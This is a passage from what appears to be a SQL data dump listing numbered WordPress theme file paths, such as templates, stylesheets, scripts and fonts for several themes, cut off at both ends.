mag/core/extras.php'),(3853,'wp-content/themes/spidermag/spidermag/core/jetpack.php'),(3854,'wp-content/themes/spidermag/spidermag/core/template-tags.php'),(3855,'wp-content/themes/spidermag/spidermag/customizer/additional-section/additional-options.php'),(3856,'wp-content/themes/spidermag/spidermag/customizer/color-section/color-options.php'),(3857,'wp-content/themes/spidermag/spidermag/customizer/custome-controller.php'),(3858,'wp-content/themes/spidermag/spidermag/customizer/customizer.php'),(3859,'wp-content/themes/spidermag/spidermag/customizer/design-section/design-layouts.php'),(3860,'wp-content/themes/spidermag/spidermag/customizer/header-section/header-breaking.php'),(3861,'wp-content/themes/spidermag/spidermag/customizer/header-section/header-pannel.php'),(3862,'wp-content/themes/spidermag/spidermag/customizer/header-section/header-utility.php'),(3863,'wp-content/themes/spidermag/spidermag/customizer/preloader.php'),(3864,'wp-content/themes/spidermag/spidermag/customizer/sanitize-functions.php'),(3865,'wp-content/themes/spidermag/spidermag/customizer/social-section/social-icons.php'),(3866,'wp-content/themes/spidermag/spidermag/customwidget/spidermag-widget.php'),(3867,'wp-content/themes/spidermag/spidermag/customwidget/widget-banner-carousel-fullwidth.php'),(3868,'wp-content/themes/spidermag/spidermag/customwidget/widget-banner-slider.php'),(3869,'wp-content/themes/spidermag/spidermag/customwidget/widget-eightblock.php'),(3870,'wp-content/themes/spidermag/spidermag/customwidget/widget-fifthblock.php'),(3871,'wp-content/themes/spidermag/spidermag/customwidget/widget-firstblock.php'),(3872,'wp-content/themes/spidermag/spidermag/customwidget/widget-latest-random.php'),(3873,'wp-content/themes/spidermag/spidermag/customwidget/widget-secondblock.php'),(3874,'wp-content/themes/spidermag/spidermag/customwidget/widget-sixthblock.php'),(3875,'wp-content/themes/spidermag/spidermag/customwidget/widget-tabbed.php'),(3876,'wp-content/themes/spidermag/spidermag/customwidget/widget-thirdblock.php'),(3877,'wp-content/themes/spidermag/spidermag/functions.php'),(3878,'wp-content/themes/spidermag/spidermag/hooks/footer.php'),(3879,'wp-content/themes/spidermag/spidermag/hooks/header.php'),(3880,'wp-content/themes/spidermag/spidermag/hooks/woocommerce.php'),(3881,'wp-content/themes/spidermag/spidermag/init.php'),(3882,'wp-content/themes/spidermag/spidermag/spidermag-plugin-activation.php'),(3883,'wp-content/themes/spidermag/style.css'),(3884,'wp-content/themes/spidermag/template-homepage.php'),(3885,'wp-content/themes/spidermag/template-parts/archives/archive-masonry.php'),(3886,'wp-content/themes/spidermag/template-parts/archives/archive-normal.php'),(3887,'wp-content/themes/spidermag/template-parts/author-none.php'),(3888,'wp-content/themes/spidermag/template-parts/content-none.php'),(3889,'wp-content/themes/spidermag/template-parts/content-page.php'),(3890,'wp-content/themes/spidermag/template-parts/content-search.php'),(3891,'wp-content/themes/spidermag/template-parts/content-single.php'),(3892,'wp-content/themes/spidermag/template-parts/content.php'),(3893,'wp-content/themes/spidermag/template-parts/login-register.php'),(3894,'wp-content/themes/spidermag/template-parts/related-posts.php'),(3895,'wp-content/themes/storeone/404.php'),(3896,'wp-content/themes/storeone/archive.php'),(3897,'wp-content/themes/storeone/comments.php'),(3898,'wp-content/themes/storeone/css/animate.css'),(3899,'wp-content/themes/storeone/css/animate.min.css'),(3900,'wp-content/themes/storeone/css/bootstrap.css'),(3901,'wp-content/themes/storeone/css/bootstrap.min.css'),(3902,'wp-content/themes/storeone/css/customizer-style.css'),(3903,'wp-content/themes/storeone/css/font-awesome.css'),(3904,'wp-content/themes/storeone/css/font-awesome.min.css'),(3905,'wp-content/themes/storeone/css/media-screen.css'),(3906,'wp-content/themes/storeone/css/owl.carousel.css'),(3907,'wp-content/themes/storeone/css/owl.carousel.min.css'),(3908,'wp-content/themes/storeone/css/simplelightbox.css'),(3909,'wp-content/themes/storeone/css/simplelightbox.min.css'),(3910,'wp-content/themes/storeone/css/theme-info.css'),(3911,'wp-content/themes/storeone/footer.php'),(3912,'wp-content/themes/storeone/functions.php'),(3913,'wp-content/themes/storeone/header.php'),(3914,'wp-content/themes/storeone/images/featured-image-340x225.png'),(3915,'wp-content/themes/storeone/images/featured-placeholder.png'),(3916,'wp-content/themes/storeone/images/shop-slide1.jpg'),(3917,'wp-content/themes/storeone/images/shop-slide2.jpg'),(3918,'wp-content/themes/storeone/images/shop-slide3.jpg'),(3919,'wp-content/themes/storeone/images/shop-slide4.jpg'),(3920,'wp-content/themes/storeone/images/slide1.jpg'),(3921,'wp-content/themes/storeone/images/slide2.jpg'),(3922,'wp-content/themes/storeone/images/slide3.jpg'),(3923,'wp-content/themes/storeone/inc/class-tgm-plugin-activation.php'),(3924,'wp-content/themes/storeone/inc/customizer.php'),(3925,'wp-content/themes/storeone/inc/extras.php'),(3926,'wp-content/themes/storeone/inc/functions.php'),(3927,'wp-content/themes/storeone/inc/include-kirki.php'),(3928,'wp-content/themes/storeone/inc/jetpack.php'),(3929,'wp-content/themes/storeone/inc/kirki-config.php'),(3930,'wp-content/themes/storeone/inc/menu-walker.php'),(3931,'wp-content/themes/storeone/inc/sanitize-cb.php'),(3932,'wp-content/themes/storeone/inc/template-tags.php'),(3933,'wp-content/themes/storeone/inc/theme-info.php'),(3934,'wp-content/themes/storeone/index.php'),(3935,'wp-content/themes/storeone/js/bootstrap.js'),(3936,'wp-content/themes/storeone/js/bootstrap.min.js'),(3937,'wp-content/themes/storeone/js/custom-script.js'),(3938,'wp-content/themes/storeone/js/customizer-controls.js'),(3939,'wp-content/themes/storeone/js/customizer.js'),(3940,'wp-content/themes/storeone/js/html5shiv.js'),(3941,'wp-content/themes/storeone/js/html5shiv.min.js'),(3942,'wp-content/themes/storeone/js/owl.carousel.js'),(3943,'wp-content/themes/storeone/js/owl.carousel.min.js'),(3944,'wp-content/themes/storeone/js/respond.js'),(3945,'wp-content/themes/storeone/js/respond.min.js'),(3946,'wp-content/themes/storeone/js/simple-lightbox.js'),(3947,'wp-content/themes/storeone/js/simple-lightbox.min.js'),(3948,'wp-content/themes/storeone/js/skip-link-focus-fix.js'),(3949,'wp-content/themes/storeone/js/wow.js'),(3950,'wp-content/themes/storeone/js/wow.min.js'),(3951,'wp-content/themes/storeone/page.php'),(3952,'wp-content/themes/storeone/readme.txt'),(3953,'wp-content/themes/storeone/screenshot.png'),(3954,'wp-content/themes/storeone/search.php'),(3955,'wp-content/themes/storeone/searchform-product.php'),(3956,'wp-content/themes/storeone/searchform.php'),(3957,'wp-content/themes/storeone/sidebar-shop.php'),(3958,'wp-content/themes/storeone/sidebar.php'),(3959,'wp-content/themes/storeone/single.php'),(3960,'wp-content/themes/storeone/style.css'),(3961,'wp-content/themes/storeone/template-parts/content-home.php'),(3962,'wp-content/themes/storeone/template-parts/content-index.php'),(3963,'wp-content/themes/storeone/template-parts/content-none.php'),(3964,'wp-content/themes/storeone/template-parts/content-page.php'),(3965,'wp-content/themes/storeone/template-parts/content-search.php'),(3966,'wp-content/themes/storeone/template-parts/content-single.php'),(3967,'wp-content/themes/storeone/template-parts/content.php'),(3968,'wp-content/themes/storeone/template-parts/home-blog.php'),(3969,'wp-content/themes/storeone/template-parts/home-product-recent.php'),(3970,'wp-content/themes/storeone/template-parts/home-product-tabs.php'),(3971,'wp-content/themes/storeone/template-parts/home-slider.php'),(3972,'wp-content/themes/storeone/template-parts/home-testimonial.php'),(3973,'wp-content/themes/storeone/template-parts/recent-post-slides.php'),(3974,'wp-content/themes/storeone/template-parts/slider-blog.php'),(3975,'wp-content/themes/storeone/template-parts/slider-shop.php'),(3976,'wp-content/themes/storeone/templates/fullwidth.php'),(3977,'wp-content/themes/storeone/templates/homepage.php'),(3978,'wp-content/themes/storeone/templates/page-left.php'),(3979,'wp-content/themes/storeone/woocommerce.php'),(3980,'wp-content/themes/travel-stories/404.php'),(3981,'wp-content/themes/travel-stories/archive.php'),(3982,'wp-content/themes/travel-stories/comments.php'),(3983,'wp-content/themes/travel-stories/editor-style.css'),(3984,'wp-content/themes/travel-stories/font/Lora-Bold/Lora-Bold.eot'),(3985,'wp-content/themes/travel-stories/font/Lora-Bold/lora-bold.svg'),(3986,'wp-content/themes/travel-stories/font/Lora-Bold/lora-bold.ttf'),(3987,'wp-content/themes/travel-stories/font/Lora-Bold/lora-bold.woff'),(3988,'wp-content/themes/travel-stories/font/Lora-Bold/lora-bold.woff2'),(3989,'wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.eot'),(3990,'wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.svg'),(3991,'wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.ttf'),(3992,'wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.woff'),(3993,'wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.woff2'),(3994,'wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.eot'),(3995,'wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.svg'),(3996,'wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.ttf'),(3997,'wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.woff'),(3998,'wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.woff2'),(3999,'wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.eot'),(4000,'wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.svg'),(4001,'wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.ttf'),(4002,'wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.woff'),(4003,'wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.woff2'),(4004,'wp-content/themes/travel-stories/footer.php'),(4005,'wp-content/themes/travel-stories/functions.php'),(4006,'wp-content/themes/travel-stories/header.php'),(4007,'wp-content/themes/travel-stories/image.php'),(4008,'wp-content/themes/travel-stories/images/quotes.png'),(4009,'wp-content/themes/travel-stories/images/search.png'),(4010,'wp-content/themes/travel-stories/images/strelka_left_dark.png'),(4011,'wp-content/themes/travel-stories/images/strelka_left_light.png'),(4012,'wp-content/themes/travel-stories/images/strelka_right_dark.png'),(4013,'wp-content/themes/travel-stories/images/strelka_right_light.png'),(4014,'wp-content/themes/travel-stories/index.php'),(4015,'wp-content/themes/travel-stories/js/jssor.js'),(4016,'wp-content/themes/travel-stories/js/jssor.slider.js'),(4017,'wp-content/themes/travel-stories/js/scripts.js'),(4018,'wp-content/themes/travel-stories/page.php'),(4019,'wp-content/themes/travel-stories/readme.txt'),(4020,'wp-content/themes/travel-stories/screenshot.png'),(4021,'wp-content/themes/travel-stories/search.php'),(4022,'wp-content/themes/travel-stories/searchform.php'),(4023,'wp-content/themes/travel-stories/sidebar-footer.php'),(4024,'wp-content/themes/travel-stories/sidebar.php'),(4025,'wp-content/themes/travel-stories/single.php'),(4026,'wp-content/themes/travel-stories/style.css'),(4027,'wp-content/themes/travel-stories/trvlstrs-nothingfound.php'),(4028,'wp-content/themes/twentynineteen/404.php'),(4029,'wp-content/themes/twentynineteen/archive.php'),(4030,'wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php'),(4031,'wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php'),(4032,'wp-content/themes/twentynineteen/comments.php'),(4033,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff'),(4034,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2'),(4035,'wp-content/themes/twentynineteen/footer.php'),(4036,'wp-content/themes/twentynineteen/functions.php'),(4037,'wp-content/themes/twentynineteen/header.php'),(4038,'wp-content/themes/twentynineteen/image.php'),(4039,'wp-content/themes/twentynineteen/images/pattern_01.jpg'),(4040,'wp-content/themes/twentynineteen/images/pattern_02.jpg'),(4041,'wp-content/themes/twentynineteen/images/pattern_03.jpg'),(4042,'wp-content/themes/twentynineteen/images/pattern_04.jpg'),(4043,'wp-content/themes/twentynineteen/inc/back-compat.php'),(4044,'wp-content/themes/twentynineteen/inc/block-patterns.php'),(4045,'wp-content/themes/twentynineteen/inc/color-patterns.php'),(4046,'wp-content/themes/twentynineteen/inc/customizer.php'),(4047,'wp-content/themes/twentynineteen/inc/helper-functions.php'),(4048,'wp-content/themes/twentynineteen/inc/icon-functions.php'),(4049,'wp-content/themes/twentynineteen/inc/template-functions.php'),(4050,'wp-content/themes/twentynineteen/inc/template-tags.php'),(4051,'wp-content/themes/twentynineteen/index.php'),(4052,'wp-content/themes/twentynineteen/js/customize-controls.js'),(4053,'wp-content/themes/twentynineteen/js/customize-preview.js'),(4054,'wp-content/themes/twentynineteen/js/priority-menu.js'),(4055,'wp-content/themes/twentynineteen/js/skip-link-focus-fix.js'),(4056,'wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js'),(4057,'wp-content/themes/twentynineteen/package-lock.json'),(4058,'wp-content/themes/twentynineteen/package.json'),(4059,'wp-content/themes/twentynineteen/page.php'),(4060,'wp-content/themes/twentynineteen/postcss.config.js'),(4061,'wp-content/themes/twentynineteen/print.css'),(4062,'wp-content/themes/twentynineteen/print.scss'),(4063,'wp-content/themes/twentynineteen/readme.txt'),(4064,'wp-content/themes/twentynineteen/sass/_normalize.scss'),(4065,'wp-content/themes/twentynineteen/sass/blocks/_blocks.scss'),(4066,'wp-content/themes/twentynineteen/sass/elements/_elements.scss'),(4067,'wp-content/themes/twentynineteen/sass/elements/_lists.scss'),(4068,'wp-content/themes/twentynineteen/sass/elements/_tables.scss'),(4069,'wp-content/themes/twentynineteen/sass/forms/_buttons.scss'),(4070,'wp-content/themes/twentynineteen/sass/forms/_fields.scss'),(4071,'wp-content/themes/twentynineteen/sass/forms/_forms.scss'),(4072,'wp-content/themes/twentynineteen/sass/layout/_layout.scss'),(4073,'wp-content/themes/twentynineteen/sass/media/_captions.scss'),(4074,'wp-content/themes/twentynineteen/sass/media/_galleries.scss'),(4075,'wp-content/themes/twentynineteen/sass/media/_media.scss'),(4076,'wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss'),(4077,'wp-content/themes/twentynineteen/sass/mixins/_utilities.scss'),(4078,'wp-content/themes/twentynineteen/sass/modules/_accessibility.scss'),(4079,'wp-content/themes/twentynineteen/sass/modules/_alignments.scss'),(4080,'wp-content/themes/twentynineteen/sass/modules/_clearings.scss'),(4081,'wp-content/themes/twentynineteen/sass/navigation/_links.scss'),(4082,'wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss'),(4083,'wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss'),(4084,'wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss'),(4085,'wp-content/themes/twentynineteen/sass/navigation/_navigation.scss'),(4086,'wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss'),(4087,'wp-content/themes/twentynineteen/sass/site/_site.scss'),(4088,'wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss'),(4089,'wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss'),(4090,'wp-content/themes/twentynineteen/sass/site/header/_site-header.scss'),(4091,'wp-content/themes/twentynineteen/sass/site/primary/_archives.scss'),(4092,'wp-content/themes/twentynineteen/sass/site/primary/_comments.scss'),(4093,'wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss'),(4094,'wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss'),(4095,'wp-content/themes/twentynineteen/sass/typography/_copy.scss'),(4096,'wp-content/themes/twentynineteen/sass/typography/_headings.scss'),(4097,'wp-content/themes/twentynineteen/sass/typography/_typography.scss'),(4098,'wp-content/themes/twentynineteen/sass/variables-site/_colors.scss'),(4099,'wp-content/themes/twentynineteen/sass/variables-site/_columns.scss'),(4100,'wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss'),(4101,'wp-content/themes/twentynineteen/sass/variables-site/_structure.scss'),(4102,'wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss'),(4103,'wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss'),(4104,'wp-content/themes/twentynineteen/screenshot.png'),(4105,'wp-content/themes/twentynineteen/search.php'),(4106,'wp-content/themes/twentynineteen/single.php'),(4107,'wp-content/themes/twentynineteen/style-editor-customizer.css'),(4108,'wp-content/themes/twentynineteen/style-editor-customizer.scss'),(4109,'wp-content/themes/twentynineteen/style-editor.css'),(4110,'wp-content/themes/twentynineteen/style-editor.scss'),(4111,'wp-content/themes/twentynineteen/style-rtl.css'),(4112,'wp-content/themes/twentynineteen/style.css'),(4113,'wp-content/themes/twentynineteen/style.scss'),(4114,'wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php'),(4115,'wp-content/themes/twentynineteen/template-parts/content/content-none.php'),(4116,'wp-content/themes/twentynineteen/template-parts/content/content-page.php'),(4117,'wp-content/themes/twentynineteen/template-parts/content/content-single.php'),(4118,'wp-content/themes/twentynineteen/template-parts/content/content.php'),(4119,'wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php'),(4120,'wp-content/themes/twentynineteen/template-parts/header/entry-header.php'),(4121,'wp-content/themes/twentynineteen/template-parts/header/site-branding.php'),(4122,'wp-content/themes/twentynineteen/template-parts/post/author-bio.php'),(4123,'wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php'),(4124,'wp-content/themes/twentytwenty/.stylelintrc.json'),(4125,'wp-content/themes/twentytwenty/404.php'),(4126,'wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css'),(4127,'wp-content/themes/twentytwenty/assets/css/editor-style-block.css'),(4128,'wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css'),(4129,'wp-content/themes/twentytwenty/assets/css/editor-style-classic.css'),(4130,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2'),(4131,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2'),(4132,'wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png'),(4133,'wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png'),(4134,'wp-content/themes/twentytwenty/assets/images/2020-square-1.png'),(4135,'wp-content/themes/twentytwenty/assets/images/2020-square-2.png'),(4136,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png'),(4137,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png'),(4138,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png'),(4139,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png'),(4140,'wp-content/themes/twentytwenty/assets/js/color-calculations.js'),(4141,'wp-content/themes/twentytwenty/assets/js/customize-controls.js'),(4142,'wp-content/themes/twentytwenty/assets/js/customize-preview.js'),(4143,'wp-content/themes/twentytwenty/assets/js/customize.js'),(4144,'wp-content/themes/twentytwenty/assets/js/editor-script-block.js'),(4145,'wp-content/themes/twentytwenty/assets/js/index.js'),(4146,'wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js'),(4147,'wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php'),(4148,'wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php'),(4149,'wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php'),(4150,'wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php'),(4151,'wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php'),(4152,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php'),(4153,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php'),(4154,'wp-content/themes/twentytwenty/comments.php'),(4155,'wp-content/themes/twentytwenty/footer.php'),(4156,'wp-content/themes/twentytwenty/functions.php'),(4157,'wp-content/themes/twentytwenty/header.php'),(4158,'wp-content/themes/twentytwenty/inc/block-patterns.php'),(4159,'wp-content/themes/twentytwenty/inc/custom-css.php'),(4160,'wp-content/themes/twentytwenty/inc/starter-content.php'),(4161,'wp-content/themes/twentytwenty/inc/svg-icons.php'),(4162,'wp-content/themes/twentytwenty/inc/template-tags.php'),(4163,'wp-content/themes/twentytwenty/index.php'),(4164,'wp-content/themes/twentytwenty/package-lock.json'),(4165,'wp-content/themes/twentytwenty/package.json'),(4166,'wp-content/themes/twentytwenty/print.css'),(4167,'wp-content/themes/twentytwenty/readme.txt'),(4168,'wp-content/themes/twentytwenty/screenshot.png'),(4169,'wp-content/themes/twentytwenty/searchform.php'),(4170,'wp-content/themes/twentytwenty/singular.php'),(4171,'wp-content/themes/twentytwenty/style-rtl.css'),(4172,'wp-content/themes/twentytwenty/style.css'),(4173,'wp-content/themes/twentytwenty/template-parts/content-cover.php'),(4174,'wp-content/themes/twentytwenty/template-parts/content.php'),(4175,'wp-content/themes/twentytwenty/template-parts/entry-author-bio.php'),(4176,'wp-content/themes/twentytwenty/template-parts/entry-header.php'),(4177,'wp-content/themes/twentytwenty/template-parts/featured-image.php'),(4178,'wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php'),(4179,'wp-content/themes/twentytwenty/template-parts/modal-menu.php'),(4180,'wp-content/themes/twentytwenty/template-parts/modal-search.php'),(4181,'wp-content/themes/twentytwenty/template-parts/navigation.php'),(4182,'wp-content/themes/twentytwenty/template-parts/pagination.php'),(4183,'wp-content/themes/twentytwenty/templates/template-cover.php'),(4184,'wp-content/themes/twentytwenty/templates/template-full-width.php'),(4185,'wp-content/themes/twentytwentyone/.stylelintignore'),(4186,'wp-content/themes/twentytwentyone/.stylelintrc-css.json'),(4187,'wp-content/themes/twentytwentyone/.stylelintrc.json'),(4188,'wp-content/themes/twentytwentyone/404.php'),(4189,'wp-content/themes/twentytwentyone/archive.php'),(4190,'wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css'),(4191,'wp-content/themes/twentytwentyone/assets/css/ie-editor.css'),(4192,'wp-content/themes/twentytwentyone/assets/css/ie.css'),(4193,'wp-content/themes/twentytwentyone/assets/css/print.css'),(4194,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css'),(4195,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css'),(4196,'wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css'),(4197,'wp-content/themes/twentytwentyone/assets/css/style-editor.css'),(4198,'wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg'),(4199,'wp-content/themes/twentytwentyone/assets/images/Reading.jpg'),(4200,'wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg'),(4201,'wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg'),(4202,'wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg'),(4203,'wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg'),(4204,'wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg'),(4205,'wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg'),(4206,'wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg'),(4207,'wp-content/themes/twentytwentyone/assets/js/customize-helpers.js'),(4208,'wp-content/themes/twentytwentyone/assets/js/customize-preview.js'),(4209,'wp-content/themes/twentytwentyone/assets/js/customize.js'),(4210,'wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js'),(4211,'wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js'),(4212,'wp-content/themes/twentytwentyone/assets/js/editor.js'),(4213,'wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js'),(4214,'wp-content/themes/twentytwentyone/assets/js/polyfills.js'),(4215,'wp-content/themes/twentytwentyone/assets/js/primary-navigation.js'),(4216,'wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js'),(4217,'wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js'),(4218,'wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss'),(4219,'wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss'),(4220,'wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss'),(4221,'wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss'),(4222,'wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss'),(4223,'wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss'),(4224,'wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss'),(4225,'wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss'),(4226,'wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss'),(4227,'wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss'),(4228,'wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss'),(4229,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss'),(4230,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss'),(4231,'wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss'),(4232,'wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss'),(4233,'wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss'),(4234,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss'),(4235,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss'),(4236,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss'),(4237,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss'),(4238,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss'),(4239,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss'),(4240,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss'),(4241,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss'),(4242,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss'),(4243,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss'),(4244,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss'),(4245,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss'),(4246,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss'),(4247,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss'),(4248,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss'),(4249,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss'),(4250,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss'),(4251,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss'),(4252,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss'),(4253,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss'),(4254,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss'),(4255,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss'),(4256,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss'),(4257,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss'),(4258,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss'),(4259,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss'),(4260,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss'),(4261,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss'),(4262,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss'),(4263,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss'),(4264,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss'),(4265,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss'),(4266,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss'),(4267,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss'),(4268,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss'),(4269,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss'),(4270,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss'),(4271,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss'),(4272,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss'),(4273,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss'),(4274,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss'),(4275,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss'),(4276,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss'),(4277,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss'),(4278,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss'),(4279,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss'),(4280,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss'),(4281,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss'),(4282,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss'),(4283,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss'),(4284,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss'),(4285,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss'),(4286,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss'),(4287,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss'),(4288,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss'),(4289,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss'),(4290,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss'),(4291,'